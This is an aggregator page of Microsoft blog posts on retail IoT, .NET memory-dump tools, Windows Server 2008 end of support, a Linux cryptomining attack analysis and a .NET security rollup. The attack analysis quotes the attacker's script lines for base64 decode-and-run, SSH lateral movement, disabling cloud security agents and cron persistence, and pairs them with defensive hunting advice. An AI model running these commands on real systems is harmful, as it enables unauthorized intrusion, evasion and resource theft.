    Today we're sharing a new IoT Signals report focused on the retail industry that provides an industry pulse on the state of IoT adoption to help inform how we better serve our partners and customers, as well as help retail leaders develop their own IoT strategies. We surveyed 168 decision makers in enterprise retail organizations to deliver an industry-level view of the IoT ecosystem, including adoption rates, related technology trends, challenges, and benefits of IoT.

    The study found that while IoT is almost universally adopted in retail and considered critical to success, companies are challenged by compliance, privacy concern, and skills shortages. To summarize the findings:

    1. Retail IoT is strong and improving customer experience is a growth opportunity. Retailers’ future planning focuses on IoT projects that help customers get in and out quickly, which increases revenue. Areas like automated checkout and optimizing inventory and layout are key, and survey respondents rank store analytics (57 percent) and supply chain optimization and inventory tracking (48 percent) as the top two IoT use cases.
    2. AI is integral to IoT and retailers who incorporate it achieve greater IoT success. For many retail IoT decision makers (44 percent), AI is a core component of their IoT solutions. Furthermore, retailers who leverage AI say they are able to use their IoT solutions more quickly and more fully. They also plan to use IoT even more in the future than those not integrating AI. Those surveyed who use AI as a core part of their solutions are more likely to use it for layout optimization, digital signage, smart shelving, and in-store contextualized marketing (including beacons).
    3. Across regions, unique retail benefits and challenges emerge around IoT, but all are committed. Globally, IoT is being widely adopted in retail, with the survey respondents in the US, UK, and France all reporting 92 percent IoT in adoption. In the US, IoT is often utilized for security and store analytics (65 percent each), while store analytics (49 percent) and supply chain and store optimization (43 percent) are more popular uses in Europe. Despite a variety of adoption barriers across regions, retailers are dedicated to overcoming challenges and leveraging IoT even more in the future.
    4. IoT is seen as critical to retail business success. Nearly 9 in 10 (87 percent) surveyed consider IoT as critical to their business success. Looking forward, respondents believe the biggest benefits they will see from IoT adoption include increased efficiency (69 percent), cost savings (64 percent), increased competitive advantage (62 percent), and new revenue streams (56 percent).
    5. The biggest barriers to success for retailers include budget, privacy concerns, compliance challenges, and talent. In the US, the top three concerns of retailers surveyed are a lack of budget, consumer privacy concerns, and lack of technical knowledge. In Europe, compliance and regulatory challenges top the list, followed by human resources and timing and deployment issues. Despite these challenges, the future of IoT looks bright, with 82 percent of US and 73 percent of European respondents anticipating greater IoT implementation in the future.

    Microsoft is leading the charge to address these IoT challenges

    We're committed to helping retail customers bring their vision to life with IoT, and this starts with simplifying and securing IoT. Our customers are embracing IoT as a core strategy to drive better business outcomes, and we are heavily investing in this space committing $5 billion in IoT and intelligent edge innovation by 2022 and growing our IoT and intelligent edge partner ecosystem to over 10,000.

    We're dramatically simplifying IoT to enable every business on the planet to benefit. We have the most comprehensive and complete IoT platform and are going beyond that to simplify IoT. Some key examples include Azure IoT Central, which enables customers and partners to provision an IoT app in seconds, customize it in hours, and go to production the same day. To help ensure that retailers have a robust talent pool of IoT developers, we've developed both an IoT School and an AI School, which provides free training for common application patterns and deployments.

    Security is crucial for trust and integrity in IoT cloud- and edge-connected devices because they may not always be in trusted custody. Azure Sphere takes a holistic security approach from silicon to cloud, providing a highly secure solution for connected microcontroller units (MCUs), which go into devices ranging from connected home devices to medical and industrial equipment. Azure Security Center provides unified security management and advanced threat protection for systems running in the cloud and on the edge.

    Finally, we’re helping our retail customers leverage their IoT investments with AI at the intelligent edge. Azure IoT Edge enables customers to distribute cloud intelligence to run in isolation on IoT devices directly and Azure Databox Edge builds on Azure IoT Edge and adds virtual machine and mass storage support. Going forward, Azure Digital Twins (currently in preview) will enable retailers to create complete virtual models of physical environments, making it easy to unlock insights into their retail environments.

    When IoT is foundational to a retailer’s transformation strategy, it can have a significantly positive impact on the bottom line, customer experiences, and products. We are invested in helping our partners, customers, and the broader industry to take the necessary steps to address barriers to success. Read the full IoT Signals Retail Report and learn how we are helping retailers embrace the future and unlock new opportunities with IoT.


    Collecting and analyzing memory dumps

    $
    0
    0

    Building upon the diagnostics improvements introduced in .NET Core 3.1, we’ve introduced a new tool for collecting heap dumps from a running .NET Core process.

    In a previous blog post we introduced, dotnet-dump, a tool to allow you to capture and analyze process dumps. Since then, we’ve been hard at work to improve the experience when working with dumps.

    Two of the key improvements we’ve made to dotnet-dump are:

    • We no longer require sudo for collecting dumps on Linux
    • dotnet dump analyze is now a supported on Windows

    GC dumps

    However, one of the key limitations that remains is process dumps are not portable. It is not possible to diagnose dumps collected on Linux with Windows and vice-versa.

    Many common scenarios don’t require a full process dump inspection. To enable these scenarios, we’ve introduced a new lightweight mechanism for collecting a dump that is portable. By triggering a garbage collection in the target process, we are able to stream events emitted by the garbage collector via the Existing EventPipe mechanism to regenerate a graph of object roots from those events.

    These GC dumps are useful for several scenarios including:

    • Comparing number of objects by type on the heap
    • Analyzing object roots
    • Finding what objects have a reference to what type
    • Other statistical analysis about objects on the heap

    dotnet-gcdump

    In .NET Core 3.1, we’re introducing a new tool that allows you to capture the aforementioned process dumps for analysis in PerfView and Visual Studio.

    You can install this .NET global tool by running the following command:

    dotnet tool install --global dotnet-gcdump
    

    Once you’ve installed dotnet gcdump, you can capture a GC dump by running the following command:

    dotnet gcdump collect -p <target-process-PID>
    

    Note: Collecting a gcdump triggers a full Gen 2 garbage collection in the target process and can change the performance characteristics of your application. The duration of the GC pause experienced by the applicaiton is proportional to the size of the GC heap; applications with larger heaps will experience longer pauses.

    The resulting .gcdump file can be analyzed in Visual Studio and PerfView on Windows.

    Analyzing GC dumps in Visual Studio

    The collected GC dumps can be analyzed by opening the .gcdump files in Visual Studio. Upon opening in Visual Studio, you are greeted with the Memory Analysis Report page.

    Memory analysis report in Visual Studio 2019

    The top pane shows the count and size of the types in the snapshot, including the size of all objects that are referenced by the type (Inclusive Size).

    In the bottom pane, the Paths to Root tree displays the objects that reference the type selected in the upper pane. The Referenced Types tree displays the references that are held by the type selected in the upper pane.

    In addition to the memory analysis report of just a single GC dump, Visual Studio also allows you to compare two gc dumps. To view details of the difference between the current snapshot and the previous snapshot, navigate to the Compare To section of the report and select another GC dump to serve as the baseline.

    Memory analysis comparison in Visual Studio 2019

    Closing

    Thanks for trying out the new diagnostics tools in .NET Core 3.1. Please continue to give us feedback, either in the comments or on GitHub. We are listening carefully and will continue to make changes based on your feedback.

    The post Collecting and analyzing memory dumps appeared first on .NET Blog.

    Turning to a new chapter of Windows Server innovation

    $
    0
    0

    Today, January 14, 2020, marks the end of support for Windows Server 2008 and Windows Server 2008 R2. Customers loved these releases, which introduced advancements such as the shift from 32-bit to 64-bit computing and server virtualization. While support for these popular releases ends today, we are excited about new innovations in cloud computing, hybrid cloud, and data that can help server workloads get ready for the new era.

    We want to thank customers for trusting Microsoft as their technology partner. We also want to make sure that we work with all our customers to support them through this transition while applying the latest technology innovations to modernize their server workloads.

    We are pleased to offer multiple options to as you make this transition. Learn how you can take advantage of cloud computing in combination with Windows Server as you make this transition. Here are some of our customers that are using Azure for their Windows Server workloads.

    Customers using Azure for their Windows Server workloads

    Customers such as All Scripts, Tencent, Alaska Airlines, and Altair Engineering are using Azure to modernize their apps and services. One great example of this is from JB Hunt Transport Services, Inc. which has over 3.5 million trucks on the road every single day.

    See how JB Hunt has driven their digital transformation with Azure:

    JB Hunt truck, linking to video

    How you can take advantage of Azure for your Windows Server workloads

    You can deploy Windows Server workloads in Azure in various ways such as Azure Virtual Machines (VMs), Azure VMware Services, and Azure Dedicated Hosts. You can apply Azure Hybrid Benefit to use existing Windows Server licenses in Azure. The benefits are immediate and tangible, Azure Hybrid Benefit alone saves 40 percent in cost. Use the Azure Total Cost of Ownership Calculator to estimate your savings by migrating your workloads to Azure.

    As you transition your Windows Server workloads to the cloud, Azure offers additional app modernization options. For example, you can migrate Remote Desktop Service to Windows Virtual Desktop on Azure, which offers the best virtual desktop experience, multi-session Windows 10, and elastic scale. You can migrate on-premises SQL Server to Azure SQL database, which offers Hyperscale, artificial intelligence, and advanced threat detection to modernize and secure your databases. Plus, you can future proof your apps, no more patching and upgrades, which is a huge benefit to many IT organizations.

    Free extended security updates on Azure

    We understand comprehensive upgrades are traditionally a time-consuming process for many organizations. To ensure that you can continue to protect your workloads, you can take advantage of three years of extended security updates, which you can learn more about here, for your Windows Server 2008 and Windows Server 2008 R2 servers only on Azure. This will allow you more time to plan the transition paths for your business-critical apps and services.

    How you can take advantage of latest innovations in Windows Server on-premises

    If your business model requires that your servers must stay on-premises, we recommend upgrading to the latest Windows Server.

    Windows Server 2019 is the latest and the most quickly adopted Windows Server version ever. Millions of instances have been deployed by customers worldwide. Hybrid capabilities of Windows Server 2019 have been designed to help customers integrate Windows Server on-premises with Azure on their own terms. Windows Server 2019 adds additional layers of security such as Windows Defender Advanced Threat Protection (ATP) and Defender Exploit Guard, which improves even further when you connect to Azure. With Kubernetes support for Windows containers, you can deploy modern-containerized Windows apps on premises or on Azure.

    With Windows Server running on-premises, you can still leverage Azure services for backup, update management, monitoring and security. To learn how you can start using these capabilities, we recommend trying Windows Admin Center – a free, browser-based app included as part of Windows Sever licenses that makes server management easier than ever.

    Start innovating with your Window Server workloads

    Getting started with the latest release of Windows Server 2019 has never been easier.

    Today also marks the end of support for Windows 7. To learn more, visit the Microsoft 365 blog.

    Learning from cryptocurrency mining attack scripts on Linux

    $
    0
    0

    Cryptocurrency mining attacks continue to represent a threat to many of our Azure Linux customers. In the past, we've talked about how some attackers use brute force techniques to guess account names and passwords and use those to gain access to machines. Today, we're talking about an attack that a few of our customers have seen where a service is exploited to run the attackers code directly on the machine hosting the service.

    This attack is interesting for several reasons. The attacker echoes in their scripts so we can see what they want to do, not just what executes on the machine. The scripts cover a wide range of possible services to exploit so they demonstrate how far the campaign can reach. Finally, because we have the scripts themselves, we can pull out good examples from the Lateral Movement, Defense Evasion, Persistence, and Objectives sections of the Linux MITRE ATT&CK Matrix and use those to talk about hunting on your own data.

    Initial vector

    For this attack, the first indication something is wrong in the audited logs is an echo command piping a base64 encoded command into base64 for decoding then piping into bash. Across our users, this first command has a parent process of an application or service exposed to the internet and the command is run by the user account associated with that process. This indicates the application or service itself was exploited in order to run the commands. While some of these accounts are specific to a customer, we also see common accounts like Ubuntu, Jenkins, and Hadoop being used. 

    /bin/sh -c "echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYm

    luOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4K<snip>CmRvbm

    UK|base64 -d|bash"

    Scripts

    It is worth taking a brief aside to talk about how this attacker uses scripts. In this case, they do nearly everything through base64 encoded scripts. One of the interesting things about those scripts is they start with the same first two lines: redirecting both the standard error and standard output stream to /dev/null and setting the path variable to locations the attacker knows generally hold the system commands they want to run. 

    exec &>/dev/null
    export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

    This indicates that when each of them is base64 encoded, the first part of the encoding is the same every time.

    ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYm

    luOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4K

    The use of the same command is particularly helpful when trying to tie attacks together across a large set of machines. The scripts themselves are also interesting because we can see what the attacker intended to run. As defenders, it can be very valuable to look at attacker scripts whenever you can so you can see how they are trying to manipulate systems. For instance, this attacker uses a for loop to cycle through different possible domain names. This type of insight gives defenders more data to pivot on during an investigation.

    for h in onion.glass civiclink.network tor2web.io onion.sh onion.mn onion.in.net onion.to
    do
    if ! ls /proc/$(cat /tmp/.X11-unix/01)/io; then
    x t<snip>v.$h
    else
    break
    fi
    done

    We observed this attacker use over thirty different encoded scripts across a number of customers, but they boiled down to roughly a dozen basic scripts with small differences in executable names or download sites. Within those scripts are some interesting examples that we can tie directly to the MITRE ATT&CK Matrix for Linux.

    Lateral Movement

    While it isn’t the first thing the attacker does, they do use an interesting combination Discovery (T1018: Remote System Discovery) and Lateral Movement (T1021: Remote Services) techniques to infect other hosts. They grep through the files .bash_history, /etc/hosts, and .ssh/known_hosts looking for IP addresses. They then attempt to pass their initial encoded script into each host using both the root account and the account they compromised on their current host without a password. Note, the xssh function appears before the call in the original script. 

    hosts=$(grep -oE "b([0-9]{1,3}.){3}[0-9]{1,3}b" ~/.bash_history /etc/hosts ~/.ssh/known_hosts |awk -F: {'print $2'}|sort|uniq ;awk {'print $1'} $HOME/.ssh/known_hosts|sort|uniq|grep -v =|sort|uniq)
    for h in $hosts;do xssh root $h; xssh $USER $h & done
    ------
    xssh() {
    ssh -oBatchMode=yes -oConnectTimeout=5 -oPasswordAuthentication=no -oPubkeyAuthentication=yes -oStrictHostKeyChecking=no $1@$2 'echo ZXhlYyA<snip>KZG9uZQo=|base64 -d|bash'
    }

    In each case, after the initial foothold is gained, the attacker uses a similar set of Defense Evasion techniques.

    Defense Evasion

    Over various scripts, the attacker uses the T1107: File Deletion, T1222: File and Directory Permissions Modification, and T1089: Disabling Security Tools techniques, as well as the obvious by this point, T1064: Scripting.

    In one script they first they make a randomly named file:

    z=./$(date|md5sum|cut -f1 -d" ")

    After they download their executable into that file, they modify the downloaded file for execution, run it, then delete the file from disk:

    chmod +x $z;$z;rm -f

    In another script, the attacker tries to download then run uninstall files for the Alibaba Cloud Security Server Guard and the AliCloud CloudMonitor service (the variable $w is set as a wget command earlier in the script).

    $w update.aegis.aliyun.com/download/uninstall.sh|bash
    $w update.aegis.aliyun.com/download/quartz_uninstall.sh|bash
    /usr/local/qcloud/stargate/admin/uninstall.sh

    Persistence

    Once the coin miner is up and running, this attacker uses a combination of T1168: Local Job Scheduling and T1501: Systemd Service scheduled tasks for persistence. The below is taken from another part of a script where they echo an ntp call and one of their base64 encoded scripts into the file systemd-ntpdate then add a cron job to run that file. The encoded script here is basically the same as their original script that started off the intrusion.

    echo -e "#x21/bin/bashnexec &>/dev/nullnntpdate ntp.aliyun.comnsleep $((RANDOM % 600))necho ZXhlYyAmPi9<snip>2gKZmkK|base64 -d|bash" > /lib/systemd/systemd-ntpdate
    echo "0 * * * * root /lib/systemd/systemd-ntpdate" > /etc/cron.d/0systemd-ntpdate
    touch -r /bin/grep /lib/systemd/systemd-ntpdate
    touch -r /bin/grep /etc/cron.d/0systemd-ntpdate
    chmod +x /lib/systemd/systemd-ntpdate

    Objectives

    As previously mentioned, the main objective of this attacker is to get a coin miner started. They do this in the very first script that is run using the T1496: Resource Hijacking tactic. One of the interesting things about this attack is that while they start by trying to get the coin miner going with the initially compromised account, one of the subsequent scripts attempts to get it started using commands from different pieces of software (T1072: Third-party Software).

    ansible all -m shell -a 'echo ZXh<snip>uZQo=|base64 -d|bash'
    knife ssh 'name:*' 'echo ZXh<snip>uZQo=|base64 -d|bash'
    salt '*' cmd.run 'echo ZXh<snip>ZQo=|base64 -d|bash'

    Hunting

    ASC Linux customers should expect to see coin mining or suspicious download alerts from this type of activity, but what if you wanted to hunt for it yourself? If you use the above script examples, there are several indicators you could follow up on, especially if you have command line logging. 

    • Do you see unexpected connections to onion and tor sites?
    • Do you see unexpected ssh connections between hosts?
    • Do you see an increase in activity from a particular user?
    • Do you see base64 commands echoed, decoded, then piped into bash? Any one of those could be suspicious depending on your own network.
    • Check your cron jobs, do you see wgets or base64 encoded lines there?
    • Check the services running on your machines, do you see anything unexpected?
    • In reference to the Objectives section above, do you see commands for pieces of software you don’t have installed?

    Azure Sentinel can help with your hunting as well. If you are an Azure Security Center customer already, we make it easy to integrate into Azure Sentinel.

    Defense

    In addition to hunting, there are a few things you can do to defend yourself from these types of attacks. If you have internet-facing services, make sure you are keeping them up to date, are changing any default passwords, and taking advantage of some of the other credential management tools Azure offers like just-in-time (JIT), password-less sign-in, and Azure Key Vault. Monitor your Azure machine utilization rates; an unexpected increase in usage could indicate a coin miner. Check out other ideas at the Azure Security Center documentation page

    Identifying attacks on Linux systems

    Coin miners represent a continuing threat to machines exposed to the internet. While it's generally easy to block a known-bad IP or use a signature-based antivirus, by studying attacker tactics, techniques, and procedures, defenders can find new and more reliable ways to protect their environments.

    While we talk about a specific coin miner attacker in this post, the basic techniques highlighted above are used by many different types of attackers of Linux systems. We see Lateral movement, Defense Evasion, and Persistence techniques similar to the above used by different attackers regularly and are continually adding new detections based on our investigations.

    Windows 7 support ends today, and Windows 10 is better than ever

    .NET Framework January Security and Quality Rollup

    $
    0
    0

    Today, we are releasing the January 2020 Security and Quality Rollup Updates for .NET Framework.

    Security

    CVE-2020-0605, CVE-2020-0606, CVE-2020-0646 – .NET Framework Remote Code Execution

    A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

    To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE).

    Quality and Reliability

    This release contains no new quality and reliability improvements.

    The Security and Quality Rollup is available via Windows Update, Windows Server Update Services, and Microsoft Update Catalog. The Security Only Update is available via Windows Server Update Services and Microsoft Update Catalog.

    Microsoft Update Catalog

    You can get the update via the Microsoft Update Catalog. For Windows 10, NET Framework 4.8 updates are available via Windows Update, Windows Server Update Services, Microsoft Update Catalog. Updates for other versions of .NET Framework are part of the Windows 10 Monthly Cumulative Update.

    Note: Customers that rely on Windows Update and Windows Server Update Services will automatically receive the .NET Framework version-specific updates. Advanced system administrators can also take use of the below direct Microsoft Update Catalog download links to .NET Framework-specific updates. Before applying these updates, please ensure that you carefully review the .NET Framework version applicability, to ensure that you only install updates on systems where they apply.

    The following table is for Windows 10 and Windows Server 2016+ versions.

    Product Version Cumulative Update
    Windows 10 1909 and Windows Server, version 1909
    .NET Framework 3.5, 4.8 Catalog 4532938
    Windows 10 1903 and Windows Server, version 1903
    .NET Framework 3.5, 4.8 Catalog 4532938
    Windows 10 1809 (October 2018 Update) and Windows Server 2019 4535101
    .NET Framework 3.5, 4.7.2 Catalog 4532947
    .NET Framework 3.5, 4.8 Catalog 4532937
    Windows 10 1803 (April 2018 Update)
    .NET Framework 3.5, 4.7.2 Catalog 4534293
    .NET Framework 4.8 Catalog 4532936
    Windows 10 1709 (Fall Creators Update)
    .NET Framework 3.5, 4.7.1, 4.7.2 Catalog 4534276
    .NET Framework 4.8 Catalog 4532935
    Windows 10 1703 (Creators Update)
    .NET Framework 3.5, 4.7, 4.7.1, 4.7.2 Catalog 4534296
    .NET Framework 4.8 Catalog 4532934
    Windows 10 1607 (Anniversary Update) and Windows Server 2016
    .NET Framework 3.5, 4.6.2, 4.7, 4.7.1, 4.7.2 Catalog 4534271
    .NET Framework 4.8 Catalog 4532933
    Windows 10 1507
    .NET Framework 3.5, 4.6, 4.6.1, 4.6.2 Catalog 4534306

    The following table is for earlier Windows and Windows Server versions.

    Product Version Security and Quality Rollup Security Only Update
    Windows 8.1, Windows RT 8.1 and Windows Server 2012 R2 4535104 4534978
    .NET Framework 3.5 Catalog 4532946 Catalog 4532961
    .NET Framework 4.5.2 Catalog 4532927 Catalog 4532962
    .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 Catalog 4532931 Catalog 4532970
    .NET Framework 4.8 Catalog 4532940 Catalog 4532951
    Windows Server 2012 4535103 4534977
    .NET Framework 3.5 Catalog 4532943 Catalog 4532958
    .NET Framework 4.5.2 Catalog 4532928 Catalog 4532963
    .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 Catalog 4532930 Catalog 4532969
    .NET Framework 4.8 Catalog 4532939 Catalog 4532950
    Windows 7 SP1 and Windows Server 2008 R2 SP1 4535102 4534976
    .NET Framework 3.5.1 Catalog 4532945 Catalog 4532960
    .NET Framework 4.5.2 Catalog 4532929 Catalog 4532964
    .NET Framework 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2 Catalog 4532932 Catalog 4532971
    .NET Framework 4.8 Catalog 4532941 Catalog 4532952
    Windows Server 2008 4535105 4534979
    .NET Framework 2.0, 3.0 Catalog 4532944 Catalog 4532959
    .NET Framework 4.5.2 Catalog 4532929 Catalog 4532964
    .NET Framework 4.6 Catalog 4532932 Catalog 4532971

    Previous Monthly Rollups

    The last few .NET Framework Monthly updates are listed below for your convenience:

    The post .NET Framework January Security and Quality Rollup appeared first on .NET Blog.

    Viewing all 5971 articles
    Browse latest View live


    <script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>